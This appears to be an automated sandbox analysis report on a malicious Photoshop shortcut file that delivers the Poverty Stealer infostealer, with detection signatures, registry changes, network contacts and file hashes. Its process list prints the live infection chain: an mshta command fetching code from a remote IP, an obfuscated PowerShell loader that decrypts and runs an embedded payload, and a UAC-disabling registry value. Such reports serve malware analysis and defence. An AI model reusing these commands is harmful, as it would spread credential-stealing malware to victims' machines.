Analysis Overview
SHA256
704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419
Threat Level: Known bad
The file photoshop.lnk was found to be: Known bad.
Malicious Activity Summary
Poverty Stealer
Detect Poverty Stealer Payload
UAC bypass
Downloads MZ/PE file
Blocklisted process makes network request
UPX packed file
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-04 20:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-04 20:17
Reported
2024-03-04 20:20
Platform
win10v2004-20240226-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Detect Poverty Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Poverty Stealer
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Lyrufos.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Photoshop_Set-Up.exe = "11001" | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk
C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
start mshta http://91.92.251.35/Downloads/Lar/photoshop
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = 'AAAAAAAAAAAAAAAAAAAAADers9PJ6xlLVT2iLiiCmurb7hNHS+bm86DyHQOtaEEHn6mCk19MuBdMWsWswZGThsWoEjZ3M2IsES6Ta+W7eVI9GxPAHKsNBidWfPy5Jjn8oHZyyldy5uSyuJqR6BazsmvPis8BD1Ize4UFUMayR+UuPK97pbXLIpdixkLzDaSaozRI+su8HTxng9oYCUT8SIDGymBlIPPirk5KwcONV5KcvEGukTi48N4QalFRoheMBLnNCEipodaLmqsqTkpccIJ1sPw/8VQXtaDtSA1nx84ZXPaN6n5x5gS8aGXXdNl80Zd3m3n+jitUAQyOjddZVJUDeL36NKWKafxmZm+IS5KvZJjwbefF0rKJWt3mHJkqzqnMZ/GZwZ7Kmo3FVHRTCMjDoGRBAuLu8bsHd/eweJH/4AuQzCNnMTbm48E8eLcZZMB+1whxlz3o1kHeLqzJFC9Ggbl+u/zoIrnRx6X8B7b5A49pT+vCVod664yu7QrgL5nd+wjhPfMFA5fg0OYvKWbOLaR+daXqVMNTy+pzKCw5btYcoWJwuD+Oq681f8H/BfFpvWqeFQTz0CLL5fezXgWH+exivRzoUVCrxT0lPKG2DMrpgYLKCri3FSvKlgJ8U/iFi+viwK6Ra4kWKteYdtMiB7yptDzhdtgfQDbDE4b7gUsRggRBiZ0an2eprwY+97rw+2bHOEnZDvJCtOayoCWdE27HcETLfLml9AlDAyw2UEqWWuFc0zxwh7lJEi/1k8jDiJu2oYs/ciElJIgjxZhz5HCeYAadPreeY32Ws0AX0FZbW2QREFOIuYJbUbsoC4JhyjWohB/lgSGx+UVx7AqKGYq110GBPcq9KM5W+df+J6s4vobxDlocNaSyV5NjiOIEcA+X9IDDoMVWpj7XDs3B6iVI2LkC0eQ9xOl2hPb9+Z7owOQeyyna6kpwr2ZKY/KhOaTUGHhCR7/y403W8Ne3HI6TmQRoFT4KtikNX5hdWYxrAr/bPpQsR4aoPm0Y';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
"C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"
C:\Users\Admin\AppData\Roaming\Lyrufos.exe
"C:\Users\Admin\AppData\Roaming\Lyrufos.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 2440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1860
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| NL | 91.92.251.35:80 | 91.92.251.35 | tcp |
| US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.251.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 91.92.251.35:80 | 91.92.251.35 | tcp |
| DE | 146.70.169.164:2227 | tcp | |
| US | 8.8.8.8:53 | 164.169.70.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 160.30.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itd2eveg.3wy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4468-0-0x0000023147190000-0x00000231471B2000-memory.dmp
memory/4468-10-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp
memory/4468-11-0x00000231472E0000-0x00000231472F0000-memory.dmp
memory/4468-12-0x00000231472E0000-0x00000231472F0000-memory.dmp
memory/4468-13-0x00000231472E0000-0x00000231472F0000-memory.dmp
memory/4468-16-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2336-33-0x000001C28C120000-0x000001C28C130000-memory.dmp
memory/2336-32-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
memory/2336-34-0x000001C28C120000-0x000001C28C130000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ca1082427d7b2cd417d7c0b7fd95e4e |
| SHA1 | b0482ff5b58ffff4f5242d77330b064190f269d3 |
| SHA256 | 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f |
| SHA512 | bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3 |
memory/2336-36-0x000001C28C120000-0x000001C28C130000-memory.dmp
memory/4932-46-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
memory/4932-48-0x0000018320040000-0x0000018320050000-memory.dmp
memory/4932-47-0x0000018320040000-0x0000018320050000-memory.dmp
memory/4932-49-0x000001833A6C0000-0x000001833A704000-memory.dmp
memory/4932-50-0x000001833AAF0000-0x000001833AB66000-memory.dmp
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
| MD5 | c56adb18f4440a6c085141c508256cbd |
| SHA1 | 9ac2fef2d12260c1e717d8de61b8a42840a1cac4 |
| SHA256 | 1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a |
| SHA512 | 4457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429 |
C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
| MD5 | b6f4b0ce8d68fa8a3d2ed69a50f4a8da |
| SHA1 | c8037db70d2c53f0efbc746efabf7968d6d09e1a |
| SHA256 | 796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead |
| SHA512 | 7d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2 |
memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp
C:\Users\Admin\AppData\Roaming\Lyrufos.exe
| MD5 | 16db89328ce227006c153728c0ade1ae |
| SHA1 | effd7c2992e64fa2d266b92054d3dee5f1e950f5 |
| SHA256 | 69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab |
| SHA512 | 6e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5 |
memory/4932-71-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
memory/2336-73-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\index.html
| MD5 | a28ab17b18ff254173dfeef03245efd0 |
| SHA1 | c6ce20924565644601d4e0dd0fba9dde8dea5c77 |
| SHA256 | 886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375 |
| SHA512 | 9371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6 |
C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\CCDInstaller.js
| MD5 | e96bb3da47f4a3319b80f23051bdeb16 |
| SHA1 | c9913b052c5c7a59e100fe18357fddc1023161ea |
| SHA256 | d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29 |
| SHA512 | 6ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e |
memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp
memory/3168-102-0x00000000005F0000-0x00000000005F1000-memory.dmp